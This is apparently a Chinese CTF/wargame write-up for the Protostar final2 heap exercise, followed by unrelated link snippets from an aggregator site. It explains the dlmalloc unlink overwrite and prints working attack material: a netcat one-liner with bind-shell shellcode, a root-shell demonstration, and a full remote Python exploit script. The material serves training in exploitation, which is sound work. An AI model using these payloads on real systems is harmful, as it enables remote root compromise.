terrying
terrying

Protostar final2

Core files will be in /tmp.<div style="margin-bottom: 10px; color: rgb(153, 153, 153); font-family: "Droid Sans', sans-serif; font-size: 14px; line-height: 20px; background-color: rgb(18, 20, 23);">This level is at /opt/protostar/bin/final2<h2 style="margin: 10px 0px; font-family: "Droid Sans', sans-serif; font-weight: normal; line-height: 40px; color: rgb(255, 255, 255); text-rendering: optimizelegibility; font-size: 31.5px; background-color: rgb(18, 20, 23);">Source code

#include "../common/common.c"
#include "../common/malloc.c"

#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993

#define REQSZ 128

void check_path(char *buf)
{
char *start;
char *p;
int l;

/*
* Work out old software bug
*/

p = rindex(buf, '/');
l = strlen(p);
if(p) {
start = strstr(buf, "ROOT");
if(start) {
while(*start != '/') start--;
memmove(start, p, l);
printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
"yes" : "no", start - buf);
}
}
}

int get_requests(int fd)
{
char *buf;
char *destroylist[256];
int dll;
int i;

dll = 0;
while(1) {
if(dll >= 255) break;

buf = calloc(REQSZ, 1);
if(read(fd, buf, REQSZ) != REQSZ) break;

if(strncmp(buf, "FSRD", 4) != 0) break;

check_path(buf + 4);

dll++;
}

for(i = 0; i < dll; i++) {
write(fd, "Process OK\n", strlen("Process OK\n"));
free(destroylist[i]);
}
}

int main(int argc, char **argv, char **envp)
{
int fd;
char *username;

/* Run the process as a daemon */
background_process(NAME, UID, GID);

/* Wait for socket activity and return */
fd = serve_forever(PORT);

/* Set the client socket to STDIN, STDOUT, and STDERR */
set_io(fd);

get_requests(fd);

}

Final2花了我不少时间,因为之前没有接触过“堆腐烂”这么高深的技术,最后找了本《缓冲区溢出攻击――检测、剖析与预防》补习才勉强知道 dlmalloc是个什么货色。现简单讲下基本的东东:
在内存中堆的位置如下图: 151908428.jpg
堆内存可通过malloc()类函数分配,由free()类函数释放,程序的堆内存是由堆管理器分配的。由malloc()分配的内存块是有边界标识(Boundary tag)的。这些位置包含的信息是内存中这个块之前和之后放被放置的两个数据块的大小
152717985.jpg
当使用free()释放数据块时会调用unlink()宏:
152844716.jpg
实际上执行的操作就是:
*(P->fd+12)=P->bk;
*(P->bk+8)=P->fd
数据块后部指针中的地址可以被写到前部指针加12所指向的位置。如果攻击者可以覆盖这两个指针并调用unlink()的话,那么就能用任何东西覆盖内存的任何位置!!!

��嗦了一大堆现开始进入正题。
通过分析题目可得在查找“/”时没有进行边界检查,而且从p开始的空余部分被复制到新的位置,另外程序规定处理每个字符串长度是128字节。我们需要利用这些来伪造出一个数据块
user@protostar:/opt/protostar/bin$ python -c "print 'FSRD'+'A'*123+'/' + 'FSRD'+'ROOT'+ 'A'*103 + '/' + '\xf8\xff\xff\xff'+'\xfc\xff\xff\xff'+'B'*4+'C'*4" | nc 127.0.0.1 2993
通过查看调试文件可以得到:
(gdb) i r edx
edx 0x43434343 1128481603
(gdb) i r eax
eax 0x42424242 1111638594
有点像heap3是不?
再看看“A"的位置在哪里:
(gdb) x/50x 0x0804e090
0x804e090: 0x0804d410 0x0804e098 0x41414141 0x41414141
0x804e0a0: 0x0804d410 0x41414141 0x41414141 0x41414141
0x804e0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x804e0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x804e0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x804e0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x804e0f0: 0x41414141 0x41414141 0x41414141 0x2f414141

这里我们选择覆盖write()的地址,write()的地址是:
user@protostar:/opt/protostar/bin$ objdump -R ./final2 | grep write
0804d41c R_386_JUMP_SLOT write
0804d468 R_386_JUMP_SLOT fwrite

现需要将A的内容变成shellcode,将A的地址覆盖到write()的位置上去,然后就能够执行shellcode了。
因此生成的payload应该是这样的
[FSRD+'A'*123+/]+[FSRD+ROOT+NOP+shellcode+<span style="background-color: rgb(255, 255, 255); color: rgb(51, 51, 51); font-family: "Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px;">'\x10\xd4\x04\x08' + '\x98\xe0\x04\x08']
如下:
user@protostar:/opt/protostar/bin$ python -c "print 'FSRD'+'A'*123+'/' + 'FSRD'+'ROOT'+ '\x90'*44 + '\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31\xd2\xcd\x80' + '/' + '\xf8\xff\xff\xff'+'\xfc\xff\xff\xff' + '\x10\xd4\x04\x08'+'\x98\xe0\x04\x08'" | nc 127.0.0.1 2993
Process OK
远程连接测试:
D:\>nc 192.168.0.71 6666
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
OK!
同样,写一份远程EXP,Python脚本如下:
#!/usr/bin/env python

from socket import *
from struct import *
from optparse import OptionParser

def exploit(host, port):

# linux/x86/shell_bind_tcp - 78 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependChrootBreak=false, AppendExit=false,
# InitialAutoRunScript=, AutoRunScript=
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" \
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" \
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" \
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" \
"\x0b\xcd\x80"

# Open the connection
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))

req_size = 128
HDR = 'FSRD'
NOP = '\x90'
free_payload = '/' + '\xf8\xff\xff\xff' + '\xfc\xff\xff\xff'
free_payload += '\x10\xd4\x04\x08' + '\x98\xe0\x04\x08'

first_req = HDR + 'A'* (req_size - len(HDR) - 1) + '/'
second_req = HDR + 'ROOT'
second_req += NOP * (req_size - len(HDR) - 4 - len(shellcode) - len(free_payload))
second_req += shellcode
second_req += free_payload

s.send(first_req+second_req)

s.close

print("[*] Exploit successfull! Now launch: nc " + str(host) + " 4444")

if __name__ == "__main__":
parser = OptionParser("usage: %prog [options]")
parser.add_option("-H", "--host", dest="hostname", default="127.0.0.1", type="string", help="Target to exploit")
parser.add_option("-p", "--port", dest="portnum", default=2993, type="int", help="Target port")

(options, args) = parser.parse_args()

exploit(options.hostname, options.portnum)



你可能感兴趣的:(Protostar,final2)

  • 二进制安全虚拟机Protostar靶场(8)heap3 Fastbins unlink exploit Ba1_Ma0 pwn二进制安全笔记安全pwnctf二进制安全
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章heap3程序静态分析https://exploit.education/protostar/heap-three/#include#include#include#include#includevoidwinner()#定义了一个名为winner的函数{printf("that
  • 二进制安全虚拟机Protostar靶场(7)heap2 UAF(use-after-free)漏洞 Ba1_Ma0 二进制安全笔记pwn安全linuxctf二进制安全pwn
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章heap2程序静态分析https://exploit.education/protostar/heap-two/#include#include#include#include#includestructauth{#定义了一个名为auth的结构体charname[32];#定义了
  • 二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1 Ba1_Ma0 pwn二进制安全笔记安全二进制安全ctfpwn
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章程序静态分析https://exploit.education/protostar/heap-one/#include#include#include#include#includestructinternet{#定义了一个名为internet的结构体intpriority;#定
  • 二进制安全虚拟机Protostar靶场(4)写入shellcode,ret to libc,构造ROP链 Stack Five,Stack Six,Stack Seven Ba1_Ma0 pwn安全pwn二进制安全ctflinux
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章二进制安全虚拟机Protostar靶场安装,基础知识讲解,破解STACKZEROhttps://blog.csdn.net/qq_45894840/article/details/129490504?spm=1001.2014.3001.5501二进制安全虚拟机Protostar
  • 二进制安全虚拟机Protostar靶场(5)堆的简单介绍以及实战 heap0 Ba1_Ma0 二进制安全笔记pwn安全二进制安全ctfpwn
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章什么是堆堆是动态内存分配的区域,程序在运行时用来分配内存。它与栈不同,栈用于静态分配内存,并且具有固定的大小程序使用如malloc、calloc、realloc等函数在堆上动态分配内存。当内存不再需要时,使用free函数释放。例如:intmain(intargc,char**ar
  • PWN入门&Protostar靶场Stack系列 cike_y PWNpwnctfgdb网络安全
    Protostar靶场地址https://exploit.education/protostar/溢出源码分析#include#include#includeintmain(intargc,char**argv){volatileintmodified;//定义一个变量charbuffer[64];//给buffer变量定义数组,c语言中一个字符数就是一个字符串modified=0;//modif
  • Java 并发编程三大特性--volatile 杀神lwz java线程java面试
    面试题:1、请谈谈你对volatile的理解?volatile是Java虚拟机提供的轻量级的同步机制1.保证可见性2.不保证原子性3.禁止指令重排2、JMM你谈谈?Java内存模型3、你在哪些地方用到过volatile?单例模式CAS底层代码目录一、并发编程的三大特性1、可见性1.1、解决可见性的方式1、加volatile解决2、加synchronized解决3、加Lock4、final2、原子性
  • matlab混沌指数的计算,Matlab编程之混沌系统李雅普诺夫指数分析 不押仄 matlab混沌指数的计算
    简介李雅普诺夫指数是衡量混沌系统的一个重要参数,下面截图是对其具体解释。代码实现:clc;clear;globalkk;e=0ina1=0;final2=10;forkk=ina1:1:final2kkInitialTime=0;%InitialtimeFinalTime=500;%FinaltimeTimeStep=0.1;%TimestepRelTol=1e-5;%Relativetolera
  • 利用Docker安装Protostar 叶卡捷琳堡 docker容器运维ubuntuctfpwn
    文章目录一、Protostar介绍二、Ubuntu下安装docker三、安装Protostar一、Protostar介绍Protostar是一个免费的Linux镜像演练环境,包含五个系列共23道漏洞分析和利用实战题目。Protostar的安装有两种方式第一种是下载镜像并安装虚拟机https://github.com/ExploitEducation/Protostar/releases/downl
  • JUC第七讲:关键字final详解 程序员 jet_qi java基础之多线程javafinal关键字重排序规则blankfinalstaticfinal实现原理
    JUC第七讲:关键字final详解final关键字看上去简单,但是真正深入理解的人可以说少之又少。本文是JUC第七讲:关键字final详解,将常规的用法简化,提出一些用法和深入的思考。文章目录JUC第七讲:关键字final详解1、带着BAT大厂的面试问题去理解final2、final基础使用2.1、修饰类2.2、修饰方法1、privatefinal2、final方法是可以被重载的2.3、修饰参数2
  • 二进制安全虚拟机Protostar靶场(3)溢出控制程序指针,基础知识讲解 Stack Three,Stack Four Ba1_Ma0 安全二进制安全pwnctfhacker
    前言这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章二进制安全虚拟机Protostar靶场安装,基础知识讲解,破解STACKZEROhttps://blog.csdn.net/qq_45894840/article/details/129490504?spm=1001.2014.3001.5501二进制安全虚拟机Protostar
  • 二进制安全虚拟机Protostar靶场(2)基础知识讲解,栈溢出覆盖变量 Stack One,Stack Two Ba1_Ma0 安全
    前言Protostar靶场的安装和一些二进制安全的基础介绍在前文已经介绍过了,这里是文章链接https://blog.csdn.net/qq_45894840/article/details/129490504?spm=1001.2014.3001.5501什么是缓冲区溢出当系统向缓冲区写入的数据多于它可以容纳的数据时,就会发生缓冲区溢出或缓冲区溢出,用更简单的话说就是在程序运行时,系统会为程序在
  • 二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO Ba1_Ma0 安全二进制安全ctfpwnhacker
    简介pwn是ctf比赛的方向之一,也是门槛最高的,学pwn前需要很多知识,这里建议先去在某宝上买一本汇编语言第四版,看完之后学一下python和c语言,python推荐看油管FreeCodeCamp的教程,c语言也是pwn题目大部分是破解在远程服务器上运行的二进制文件,利用二进制文件中的漏洞来获得对系统的访问权限这是一个入门pwn很好的靶场,这个靶场包括了:网络编程处理套接字栈溢出格式化字符串堆溢
  • StarkNet 配置 protostar 部署Cairo合约 瘦身小蚂蚁 Linux安装配置ubuntulinux
    1、安装protostar1.0、环境操作系统:Ubuntu22.04安装git:可参考链接中的2.4.4VMware安装Ubuntu22.04_瘦身小蚂蚁的博客-CSDN博客1.1、更新软件包列表sudoaptupdatetracy@tracy-virtual-machine:~$sudoaptupdateGet:1http://security.ubuntu.com/ubuntujammy-s
  • 分支预测器实验简述 Hellsegamosken 实践记录分支预测gshare
    经yyh提醒,加了一条优化,在一些测试点上有很大提升(final2)。本来没打算写的,一是因为最近太忙了,二是因为这个东西太玄学了,很多地方都在吊打我的常识。开始做的时候已经是提交当天下午了(当时还没有延期的通知),所以前面没做好数据记录。拿到代码以后我首先试了很多种平凡的改法,比如PCxorghr改为(PC<<2)xorghr之类的,改进不大,大多数情况下都要比基本的gshare劣。然后实现了一
  • Java内存模型final的内存语义
    目录1、final域的重排序规则final2、写final域的重排序规则3、读final与的重排序规则4、final域为引用类型5、为什么final引用不能从构造函数内“逸出”6、final语义在处理器中的实现7、JSR-133为什么要增强final的语义上篇并发编程之Java内存模型volatile的内存语义介绍了volatile的内存语义,本文讲述的是final的内存语义,相比之下,final
  • 基于java中的null类型---有关null的9件事
    目录关于null的9件事1、首先,null是java中的关键字,像public、static、final2、就像每种原始类型都有默认值一样3、要澄清一些误解4、null可以赋值给引用变量5、任何含有null值的包装类6、如果使用了带有null值的引用类型的变量,instanceof操作会返回false7、可以使用静态方法来使用一个值为null的引用类型变量8、可以将null传递给方法使用9、可以使
  • Haruhana采访佐藤景瑚部分② Aura_23ad
    节目中的成长起到了作用3月4日公开了出道单曲「PROTOSTAR」的JO1。出道单曲的意思为“原恒星”,代表着今后会闪闪发光的他们的起点。——这张专辑中把名曲都收藏在了一起,如果要从这些收录曲中选择一首作为课题的话,会选择哪首曲子呢?(略)佐藤「我也(选择“无限大”)。因为能够感受到hiphop的律动,舞蹈很帅气」(略)——在「PRODUCE101JAPAN」留下最深刻回忆的场景是?(略)佐藤「我
  • final,finally,finalize的区别 nice美滋滋 java面试
    一、final关键字final的简单使用1)定义变量,包括静态的和非静态的。2)定义方法的参数。3)定义方法。4)定义类。final的注意事项1)final类不能被继承,没有子类,final类中的方法默认都是final2)final方法不能被子类方法覆盖,但可以被继承3)final成员变量表示常量,只能被赋值一次且赋值后不再改变4)final空白:在使用前必须被初始化5)final不能修饰构造函数
  • Exploit-Exercise之Protostar-stack Neil-Yale bin
    0x00Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。本文将介绍stack部分。关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录查看ip知道ip后可以在kali中ssh连上输入user即可机器上所有需要分析的程
  • javaoop_第三章_多态 FreeDistance
    1、一个类不想被继承就写一个final2、多态是具有表现多种形态的能力的特征。多态的特性:可以减少代码量,且可以提高代码的可扩展性和可维护性。3、将一个父类的引用指向一个子类对象即是向上转型,自动进行类型转换。4、向上转型后通过父类引用变量调用的方法是子类覆盖或者继承父类的方法,通过父类引用变量无法调用子类特有的方法。5、向下转型后可以访问子类特有的方法。注意必须转换为父类指向的真是子类类型,否则
  • java刷题总结一 qq_37036963
    1、关于内部类、外部类的修饰符内部类可以是静态static的,也可用public,default,protected和private修饰,外部类的修饰符只能是public,abstract,final2、关于接口和抽象类的特点抽象类a.抽象类都不能被实例化,必须用abstract修饰b,抽象类可以实现接口中的方法,而且不需要全部实现(是类就是可以实现接口的)c.抽象类中可以有普通方法、普通属性、静
  • 漏洞练习之网络编程与堆栈溢出技术 合天智汇
    0x00公众号之前发过Exploit-Exercise之Nebula实践指南,Exploit-Exercise一共有5个镜像可供练习,如下所示本系列文章将会介绍第二个镜像Protostar的通关经验。Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。本文将介绍net,final部分。关于环境准备,在官网https://exploit-exercises.lains.s
  • Java易混基础知识点 YancyChang JavaSE
    1、final关键字声明类可以把类定义为不能继承的,即最终类;或者用于修饰方法,该方法不能被子类重写,实例变量也可以被定义为final,被定义为final的变量不能被修改。注:被声明为final类的方法自动地声明为final,但是实例变量并不是final2、声明抽象方法会造成以下两个结果:·如果一个类包含抽象方法,那么该类必须是抽象类。·任何子类必须重写父类的抽象方法,或者声明自身为抽象类。3、抽
  • 多态 weixin_41770289
    1多态的条件·有继承关系·方法重重写1、一个类不想被继承就写一个final2、多态是具有表现多种形态的能力的特征。多态的特性:可以减少代码量,且可以提高代码的可扩展性和可维护性。3、将一个父类的引用指向一个子类对象即是向上转型,自动进行类型转换。4、向上转型后通过父类引用变量调用的方法是子类覆盖或者继承父类的方法,通过父类引用变量无法调用子类特有的方法。5、向下转型后可以访问子类特有的方法。注
  • Matlab编程之混沌系统李雅普诺夫指数分析 wjzblog matlab编程
    简介李雅普诺夫指数是衡量混沌系统的一个重要参数,下面截图是对其具体解释。代码实现:clc;clear;globalkk;e=0ina1=0;final2=10;forkk=ina1:1:final2kkInitialTime=0;%InitialtimeFinalTime=500;%FinaltimeTimeStep=0.1;%TimestepRelTol=1e-5;%Relativetolera
  • java抽象类(abstract)与接口(Interface)的区别 宜春 Java基础专栏
    前言抽象类、抽象方法以及接口,这三个知识点是每个程序员必备的基础,无论是在实际编程的时候,还是在面试的时候,都会出现这类问题,面试官很可能就会问你,interface和abstract的区别,希望看完这篇博客文章各位都能从容地回答…文章目录1、关于抽象类(abstract)1、抽象类小结2、抽象类组成分析3、不能共存的关键字1、final2、private3、static2、关于接口(interf
  • 校招----青颖飞帆一面面经 Kollin 面经
    面了半个多钟,也不算是很难,照着简历问的,但总感觉要凉凉的样子。1、String为什么加final2、讲讲hashmap底层3、hashmap1.8之前和之后的差别4、反射原理5、索引和主键的区别6、索引为什么可以提高查找速度7、索引怎么实现8、说说http协议9、说说js原型10、jvm内存、参数11、线程与进程的区别12、有了进程为什么还要有线程13、手写代码一个乱序的数组求第五大的值,双指针
  • Java之字符串&equals、==、包装类、常量池 finalheart java基础
    在java中有三中对字符串的操作方式。注:文章只注明思路原理。不注明方法,看API就行了。文章就涉及到啥写啥了,哈哈,瞅着可能乱一点。但是这么写就很舒服1、String常量效率较低指的是多进行字符串拼接操作时的效率final2、StringBuffer变量效率其次多线程安全3、StringBuilder变量效率最快多线程不安全先看看String这个类。这个类被final修饰,所以不能被继承。对于S
  • 加载失败Error Domain=WebKitErrorDomain Code=204 "插件处理的载入" 磊怀 ITiOSCode=204
    报错如下**加载失败ErrorDomain=WebKitErrorDomainCode=204"插件处理的载入"UserInfo={_WKRecoveryAttempterErrorKey=,NSErrorFailingURLStringKey=https://h5-test.protostar.xianlaigame.com/assets/v1.0.0/video/m/2~2.mp4?appId
  • 开发者关心的那些事 圣子足道 ios游戏编程apple支付
    我要在app里添加IAP,必须要注册自己的产品标识符(product identifiers)。产品标识符是什么? 产品标识符(Product Identifiers)是一串字符串,它用来识别你在应用内贩卖的每件商品。App Store用产品标识符来检索产品信息,标识符只能包含大小写字母(A-Z)、数字(0-9)、下划线(-)、以及圆点(.)。你可以任意排列这些元素,但我们建议你创建标识符时使用
  • 负载均衡器技术Nginx和F5的优缺点对比 bijian1013 nginxF5
            对于数据流量过大的网络中,往往单一设备无法承担,需要多台设备进行数据分流,而负载均衡器就是用来将数据分流到多台设备的一个转发器。         目前有许多不同的负载均衡技术用以满足不同的应用需求,如软/硬件负载均衡、本地/全局负载均衡、更高
  • LeetCode[Math] - #9 Palindrome Number Cwind javaAlgorithm题解LeetCodeMath
    原题链接:#9 Palindrome Number   要求: 判断一个整数是否是回文数,不要使用额外的存储空间   难度:简单   分析: 题目限制不允许使用额外的存储空间应指不允许使用O(n)的内存空间,O(1)的内存用于存储中间结果是可以接受的。于是考虑将该整型数反转,然后与原数字进行比较。 注:没有看到有关负数是否可以是回文数的明确结论,例如
  • 画图板的基本实现 15700786134 画图板
     要实现画图板的基本功能,除了在qq登陆界面中用到的组件和方法外,还需要添加鼠标监听器,和接口实现。 首先,需要显示一个JFrame界面: public class DrameFrame extends JFrame {              //显示
  • linux的ps命令 被触发 linux
    Linux中的ps命令是Process Status的缩写。ps命令用来列出系统中当前运行的那些进程。ps命令列出的是当前那些进程的快照,就是执行ps命令的那个时刻的那些进程,如果想要动态的显示进程信息,就可以使用top命令。 要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而 ps 命令就是最基本同时也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行
  • Android 音乐播放器 下一曲 连续跳几首歌 肆无忌惮_ android
    最近在写安卓音乐播放器的时候遇到个问题。在MediaPlayer播放结束时会回调 player.setOnCompletionListener(new OnCompletionListener() { @Override public void onCompletion(MediaPlayer mp) { mp.reset(); Log.i("H
  • java导出txt文件的例子 知了ing javaservlet
    代码很简单就一个servlet,如下: package com.eastcom.servlet; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URLEncoder; import java.sql.Connection; import java.sql.Resu
  • Scala stack试玩, 提高第三方依赖下载速度 矮蛋蛋 scalasbt
    原文地址: http://segmentfault.com/a/1190000002894524 sbt下载速度实在是惨不忍睹, 需要做些配置优化 下载typesafe离线包, 保存为ivy本地库 wget http://downloads.typesafe.com/typesafe-activator/1.3.4/typesafe-activator-1.3.4.zip 解压r
  • phantomjs安装(linux,附带环境变量设置) ,以及casperjs安装。 alleni123 linuxspider
    1. 首先从官网 http://phantomjs.org/下载phantomjs压缩包,解压缩到/root/phantomjs文件夹。 2. 安装依赖 sudo yum install fontconfig freetype libfreetype.so.6 libfontconfig.so.1 libstdc++.so.6 3. 配置环境变量 vi /etc/profil
  • JAVA IO FileInputStream和FileOutputStream,字节流的打包输出 百合不是茶 java核心思想JAVA IO操作字节流
    在程序设计语言中,数据的保存是基本,如果某程序语言不能保存数据那么该语言是不可能存在的,JAVA是当今最流行的面向对象设计语言之一,在保存数据中也有自己独特的一面,字节流和字符流 1,字节流是由字节构成的,字符流是由字符构成的 字节流和字符流都是继承的InputStream和OutPutStream ,java中两种最基本的就是字节流和字符流   类 FileInputStream
  • Spring基础实例(依赖注入和控制反转) bijian1013 spring
    前提条件:在http://www.springsource.org/download网站上下载Spring框架,并将spring.jar、log4j-1.2.15.jar、commons-logging.jar加载至工程1.武器接口 package com.bijian.spring.base3; public interface Weapon { void kil
  • HR看重的十大技能 bijian1013 提升能力HR成长
        一个人掌握何种技能取决于他的兴趣、能力和聪明程度,也取决于他所能支配的资源以及制定的事业目标,拥有过硬技能的人有更多的工作机会。但是,由于经济发展前景不确定,掌握对你的事业有所帮助的技能显得尤为重要。以下是最受雇主欢迎的十种技能。   一、解决问题的能力   每天,我们都要在生活和工作中解决一些综合性的问题。那些能够发现问题、解决问题并迅速作出有效决
  • 【Thrift一】Thrift编译安装 bit1129 thrift
    什么是Thrift The Apache Thrift software framework, for scalable cross-language services development, combines a software stack with a code generation engine to build services that work efficiently and s
  • 【Avro三】Hadoop MapReduce读写Avro文件 bit1129 mapreduce
    Avro是Doug Cutting(此人绝对是神一般的存在)牵头开发的。 开发之初就是围绕着完善Hadoop生态系统的数据处理而开展的(使用Avro作为Hadoop MapReduce需要处理数据序列化和反序列化的场景),因此Hadoop MapReduce集成Avro也就是自然而然的事情。 这个例子是一个简单的Hadoop MapReduce读取Avro格式的源文件进行计数统计,然后将计算结果
  • nginx定制500,502,503,504页面 ronin47 nginx 错误显示
    server { listen 80; error_page 500/500.html; error_page 502/502.html; error_page 503/503.html; error_page 504/504.html; location /test {return502;}} 配置很简单,和配
  • java-1.二叉查找树转为双向链表 bylijinnan 二叉查找树
    import java.util.ArrayList; import java.util.List; public class BSTreeToLinkedList { /* 把二元查找树转变成排序的双向链表 题目: 输入一棵二元查找树,将该二元查找树转换成一个排序的双向链表。 要求不能创建任何新的结点,只调整指针的指向。 10 / \ 6 14 / \
  • Netty源码学习-HTTP-tunnel bylijinnan javanetty
    Netty关于HTTP tunnel的说明: http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/socket/http/package-summary.html#package_description 这个说明有点太简略了 一个完整的例子在这里: https://github.com/bylijinnan
  • JSONUtil.serialize(map)和JSON.toJSONString(map)的区别 coder_xpf jqueryjsonmapval()
     JSONUtil.serialize(map)和JSON.toJSONString(map)的区别   数据库查询出来的map有一个字段为空   通过System.out.println()输出 JSONUtil.serialize(map): {"one":"1","two":"nul
  • Hibernate缓存总结 cuishikuan 开源sshjavawebhibernate缓存三大框架
    一、为什么要用Hibernate缓存? Hibernate是一个持久层框架,经常访问物理数据库。 为了降低应用程序对物理数据源访问的频次,从而提高应用程序的运行性能。 缓存内的数据是对物理数据源中的数据的复制,应用程序在运行时从缓存读写数据,在特定的时刻或事件会同步缓存和物理数据源的数据。   二、Hibernate缓存原理是怎样的? Hibernate缓存包括两大类:Hib
  • CentOs6 dalan_123 centos
    首先su - 切换到root下面1、首先要先安装GCC GCC-C++ Openssl等以来模块:yum -y install make gcc gcc-c++ kernel-devel m4 ncurses-devel openssl-devel2、再安装ncurses模块yum -y install ncurses-develyum install ncurses-devel3、下载Erang
  • 10款用 jquery 实现滚动条至页面底端自动加载数据效果 dcj3sjt126com JavaScript
      无限滚动自动翻页可以说是web2.0时代的一项堪称伟大的技术,它让我们在浏览页面的时候只需要把滚动条拉到网页底部就能自动显示下一页的结果,改变了一直以来只能通过点击下一页来翻页这种常规做法。 无限滚动自动翻页技术的鼻祖是微博的先驱:推特(twitter),后来必应图片搜索、谷歌图片搜索、google reader、箱包批发网等纷纷抄袭了这一项技术,于是靠滚动浏览器滚动条
  • ImageButton去边框&Button或者ImageButton的背景透明 dcj3sjt126com imagebutton
    在ImageButton中载入图片后,很多人会觉得有图片周围的白边会影响到美观,其实解决这个问题有两种方法 一种方法是将ImageButton的背景改为所需要的图片。如:android:background="@drawable/XXX" 第二种方法就是将ImageButton背景改为透明,这个方法更常用 在XML里;    <ImageBut
  • JSP之c:foreach eksliang jspforearch
    原文出自:http://www.cnblogs.com/draem0507/archive/2012/09/24/2699745.html <c:forEach>标签用于通用数据循环,它有以下属性 属 性 描 述 是否必须 缺省值 items 进行循环的项目 否 无 begin 开始条件 否 0 end 结束条件 否 集合中的最后一个项目 step 步长 否 1
  • Android实现主动连接蓝牙耳机 gqdy365 android
    在Android程序中可以实现自动扫描蓝牙、配对蓝牙、建立数据通道。蓝牙分不同类型,这篇文字只讨论如何与蓝牙耳机连接。 大致可以分三步: 一、扫描蓝牙设备: 1、注册并监听广播: BluetoothAdapter.ACTION_DISCOVERY_STARTED BluetoothDevice.ACTION_FOUND BluetoothAdapter.ACTION_DIS
  • android学习轨迹之四:org.json.JSONException: No value for hyz301 json
    org.json.JSONException: No value for items  在JSON解析中会遇到一种错误,很常见的错误   06-21 12:19:08.714 2098-2127/com.jikexueyuan.secret I/System.out﹕ Result:{"status":1,"page":1,&
  • 干货分享:从零开始学编程 系列汇总 justjavac 编程
    程序员总爱重新发明轮子,于是做了要给轮子汇总。 从零开始写个编译器吧系列 (知乎专栏) 从零开始写一个简单的操作系统 (伯乐在线) 从零开始写JavaScript框架 (图灵社区) 从零开始写jQuery框架 (蓝色理想 ) 从零开始nodejs系列文章 (粉丝日志) 从零开始编写网络游戏 
  • jquery-autocomplete 使用手册 macroli jqueryAjax脚本
    jquery-autocomplete学习 一、用前必备 官方网站:http://bassistance.de/jquery-plugins/jquery-plugin-autocomplete/ 当前版本:1.1 需要JQuery版本:1.2.6 二、使用 <script src="./jquery-1.3.2.js" type="text/ja
  • PLSQL-Developer或者Navicat等工具连接远程oracle数据库的详细配置以及数据库编码的修改 超声波 oracleplsql
      在服务器上将Oracle安装好之后接下来要做的就是通过本地机器来远程连接服务器端的oracle数据库,常用的客户端连接工具就是PLSQL-Developer或者Navicat这些工具了。刚开始也是各种报错,什么TNS:no listener;TNS:lost connection;TNS:target hosts...花了一天的时间终于让PLSQL-Developer和Navicat等这些客户
  • 数据仓库数据模型之:极限存储--历史拉链表 superlxw1234 极限存储数据仓库数据模型拉链历史表
    在数据仓库的数据模型设计过程中,经常会遇到这样的需求: 1. 数据量比较大; 2. 表中的部分字段会被update,如用户的地址,产品的描述信息,订单的状态等等; 3. 需要查看某一个时间点或者时间段的历史快照信息,比如,查看某一个订单在历史某一个时间点的状态,    比如,查看某一个用户在过去某一段时间内,更新过几次等等; 4. 变化的比例和频率不是很大,比如,总共有10
  • 10点睛Spring MVC4.1-全局异常处理 wiselyman spring mvc
    10.1 全局异常处理 使用@ControllerAdvice注解来实现全局异常处理; 使用@ControllerAdvice的属性缩小处理范围 10.2 演示 演示控制器 package com.wisely.web; import org.springframework.stereotype.Controller; import org.spring
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他